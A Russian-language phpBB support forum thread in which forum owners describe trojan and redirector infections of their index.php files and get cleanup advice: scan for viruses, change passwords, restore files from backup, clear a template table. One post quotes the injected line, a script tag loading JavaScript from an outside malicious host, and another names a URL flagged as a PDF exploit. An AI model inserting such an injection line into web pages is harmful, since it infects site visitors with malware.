Пропустить

Как убить Трояна?

Вопросы без привязки к версии. Установлена авточистка (2 года).
Свернуть Развернуть Правила форума Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ-3 (phpbb3) | Как задавать вопросы | Как устанавливать моды

Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение ;) ).

Как убить Трояна?

Сообщение AdmninsCluba » 12.05.2007 15:23

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html

AdmninsCluba
phpBB 1.2.0
 
Сообщения: 17
Зарегистрирован: 03.09.2006 18:10
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.

Re: Появилась -0 страница.

Сообщение Smilley » 07.11.2009 13:17

Спасибо большое, всё заработало. А всвязи с чем такое могло произойти чтобы впредь знать как предотвратить такое.

Smilley
phpBB 1.0.0
 
Сообщения: 3
Зарегистрирован: 07.11.2009 12:49
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.

Re: Появилась -0 страница.

Сообщение Rayden » 07.11.2009 13:52

видимо некорректное количество сообщений записалось в таблицу с форумами. Нажатие кнопки "синхро..." пересчитало все заново.
phpBB2 FAQ
phpBB3 FAQ
Аватара пользователя
Rayden
Former team member
 
Сообщения: 3841
Зарегистрирован: 27.06.2005 0:07
Благодарил (а): 0 раз.
Поблагодарили: 27 раз.

Re: Как убить Трояна?

Сообщение potim » 16.03.2010 21:40

Подцепил js.redirector.based.2 по версии dr web cureit, первый раз занес с локальной машины.
Почистился вручную, часть из пакета инсталляции, часть вручную. Убрал учетные записи в фтп-менеджере.

Через неделю новое заражение, не совсем понимаю откуда. Подозрение на хвосты с предыдущей чистки.

Пароли не храню (после первого заражения)
От провайдера поддержки нет

Кто чистился, посоветуйте на что обращать внимание?
Какое поведение у вируса, кроме движения по файлам index.* и *.js

Локально машина чистая, проверился сегодняшним CureIt!
Версия phpBB 3.0.7-PL1 спасибо.

potim
phpBB 1.0.0
 
Сообщения: 2
Зарегистрирован: 06.03.2010 11:46
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.

Re: Как убить Трояна?

Сообщение GVD » 16.03.2010 21:49

Мою CPG задушили напрочь - это уже происходит совсем не так, как раньше. Прописываются или изменяют практически все файлы галереи.
Всё течёт, всё изменяется.
Аватара пользователя
GVD
phpBB 1.4.0
 
Сообщения: 36
Зарегистрирован: 02.02.2007 22:38
Откуда: Питер
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.

Взлом phpbb 3.0.5

Сообщение UmaCat » 04.05.2010 21:31

Опишу что у меня
может предложите варианты.
форум phpbb 3.0.5
знаю, скажете давно не обновлял - автообновление превышает нагрузку на сервак хостера и никак не получается сделать последнее обновление (теперь уже два последних)
сегодня вечером, обнаруживаю что форум выдает ошибки, антивирус (Avast) вопит что что-то хочет на мой комп вот отсюда

http_://flying-city-2010.com//viewtopic.php\{gzip} [L] JS:Pdfka-AEP [Expl] (0)

начинаю копать через ФТП
обнаруживаю
1. все index.php во всех папках изменены текущим числом
2. везде в них присутствует /includes/hooks/index.php
3. нахожу эту папку, там какой-то файл index.php с заныканным внутри него java-script - явно зашифрованным - потому что понять что там не удалось :)
4. становится стремно, переименовываю папку чтобы не ссылалось, заменяю index.php на старый из комлпекта phpbb3

теперь собственно вопрос
каким образом за 4 минуты (с 13:06 до 13:10), были испорчены ВСЕ файлы на хостинге моем которые были с именем index.php
каким образом можно записать на хостинг новую папку с новым файлом, если я не заходил своим паролем на хостинг-админку уже пару месяцев (знали бы - раньше сломали бы).
другие CMS на хостинге сделаны на php-fusion - знаю система дырявая, но простая, сайты между собой не связаны ни контентом ничем больше (кроме того что хостятся на одном сервере).

Я не спрашиваю что делать :( - понятно что очистить все мне просто не удастся, все надо удалять
Я прошу просто помочь сделать копию БД
воможно ли подцепить версию phphbb установленную - к уже имеющейся БД?
возможны ли проблемы в самой БД?

спасибо

UmaCat
phpBB 1.0.0
 
Сообщения: 9
Зарегистрирован: 13.04.2008 12:14
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.

Re: Взлом phpbb 3.0.5

Сообщение MAzZY » 04.05.2010 21:47

У Вас на компе вирус.
Действия обычные:
- проверяемся на вирусы
- меняем ВСЕ пароли
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html
Заработок на сайтах и форумах. Рефералам помогу установить код и начать зарабатывать.
Хороший хостинг в Питере
Аватара пользователя
MAzZY
Former team member
 
Сообщения: 2969
Зарегистрирован: 14.05.2005 22:43
Благодарил (а): 50 раз.
Поблагодарили: 54 раз.
Предупреждения: 1

Re: Взлом phpbb 3.0.5

Сообщение MIT » 04.05.2010 22:05

UmaCat писал(а):сайты между собой не связаны ни контентом ничем больше (кроме того что хостятся на одном сервере)
Этого достаточно :roll:
UmaCat писал(а):воможно ли подцепить версию phphbb установленную - к уже имеющейся БД?
Да
UmaCat писал(а):возможны ли проблемы в самой БД?
Да
Аватара пользователя
MIT
Поддержка
Поддержка
 
Сообщения: 1901
Зарегистрирован: 14.03.2009 17:52
Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
Благодарил (а): 17 раз.
Поблагодарили: 245 раз.

Re: Взлом phpbb 3.0.5

Сообщение UmaCat » 04.05.2010 23:29

заменил все что было изменено вредными вирусописателями :)
но такое впечатление что форум закешировал страницы, как не входя в админку очистить кеш?
папка cache почищена ( там только свежий index.php и htaccess)
где еще проверить?

просто файлы заменены уже, а все равно браузер показывает что идет обращение к несуществующему файлу

[phpBB Debug] PHP Notice: in file /common.php on line 219: main(./includes/hooks/index.php) [function.main]: failed to open stream: No such file or directory

плин походу у меня в базе хрень эта прописывает
сори, пошел чиститься дальше

UmaCat
phpBB 1.0.0
 
Сообщения: 9
Зарегистрирован: 13.04.2008 12:14
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.

Re: Взлом phpbb 3.0.5

Сообщение Rayden » 04.05.2010 23:37

UmaCat писал(а):где еще проверить?

Очисть таблицу phpbb_styles_template_data
UmaCat писал(а):includes/hooks/index.php

Проверь наличие файла. Лучше замени чистым и дистрибутива.
phpBB2 FAQ
phpBB3 FAQ
Аватара пользователя
Rayden
Former team member
 
Сообщения: 3841
Зарегистрирован: 27.06.2005 0:07
Благодарил (а): 0 раз.
Поблагодарили: 27 раз.

Re: Взлом phpbb 3.0.5

Сообщение UmaCat » 04.05.2010 23:45

Всем, спасибо
восстановился.
CureIt нашел кейлоггера на компе.
возможно из-за него

но все равно не понятно, почему умный чел-хакер повредил ВСЕ файлы index.php которые имели хоть какое-то отношение к CMS/форумам (разные - php-fusion / e107/ phpbb3 ) а также все файлы с именем main.php, но при этом совершенно не тронул файлы index.php которые отвечали только за редирект.

странно мне это, это же если за 4 минуты все было сделано явно делалось скриптом, логики не могу найти, неужели в скрипт запихали инфу о большинстве CMS/форумах?

Еще раз спасибо

UmaCat
phpBB 1.0.0
 
Сообщения: 9
Зарегистрирован: 13.04.2008 12:14
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.

Re: Взлом phpbb 3.0.5

Сообщение Addict » 05.05.2010 12:47

Не стоит хранить пароли в фтп-клиентах.
Аватара пользователя
Addict
phpBB 1.2.0
 
Сообщения: 18
Зарегистрирован: 10.02.2009 19:23
Откуда: мск
Благодарил (а): 4 раз.
Поблагодарили: 2 раз.

Re: Взлом phpbb 3.0.5

Сообщение Nekstati » 05.05.2010 13:38

И в браузерах не стоит. И на бумажках тоже. Надо тренировать память. Санитар, уведите пациента.
Аватара пользователя
Nekstati
Лидер поддержки
Лидер поддержки
 
Сообщения: 2181
Зарегистрирован: 19.03.2009 17:43
Благодарил (а): 6 раз.
Поблагодарили: 607 раз.

Re: Как убить Трояна?

Сообщение crash » 06.05.2010 8:34

только пароль написаный фломастером на экране монитора спасет отца русской демократии :)
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
Аватара пользователя
crash
Former team member
 
Сообщения: 6619
Зарегистрирован: 07.07.2004 16:12
Откуда: Бердск
Благодарил (а): 0 раз.
Поблагодарили: 16 раз.

Re: Как убить Трояна?

Сообщение Leviafant » 07.08.2010 10:02

Форумом давно не занимаюсь, стоит 3.0.4
вот такой код дописан в индексовых файлах, рад всех разочаровать, я пользуюсь линуксом :lol:
видимо уязвимость все же в скрипте форума
<script type="text/javascript" src="http://obscurewax.ru/URL.js"></script>
<!--cfae47f881e849f7bf3261c16b6b917c-->
Аватара пользователя
Leviafant
phpBB 2.0.0
 
Сообщения: 113
Зарегистрирован: 23.01.2007 22:45
Откуда: Курск
Благодарил (а): 0 раз.
Поблагодарили: 1 раз.

Re: Как убить Трояна?

Сообщение MIT » 07.08.2010 10:04

Криворукость страшна под любой осью
Аватара пользователя
MIT
Поддержка
Поддержка
 
Сообщения: 1901
Зарегистрирован: 14.03.2009 17:52
Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
Благодарил (а): 17 раз.
Поблагодарили: 245 раз.

Пред.След.

Вернуться в phpBB-пространство

 

  • Похожие темы
    Ответы
    Просмотры
    Последнее сообщение

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 0

Бессрочный конкурс phpBB-ориентированных материалов
FastVPS — надёжный и доступный хостинг для phpBB
Изображение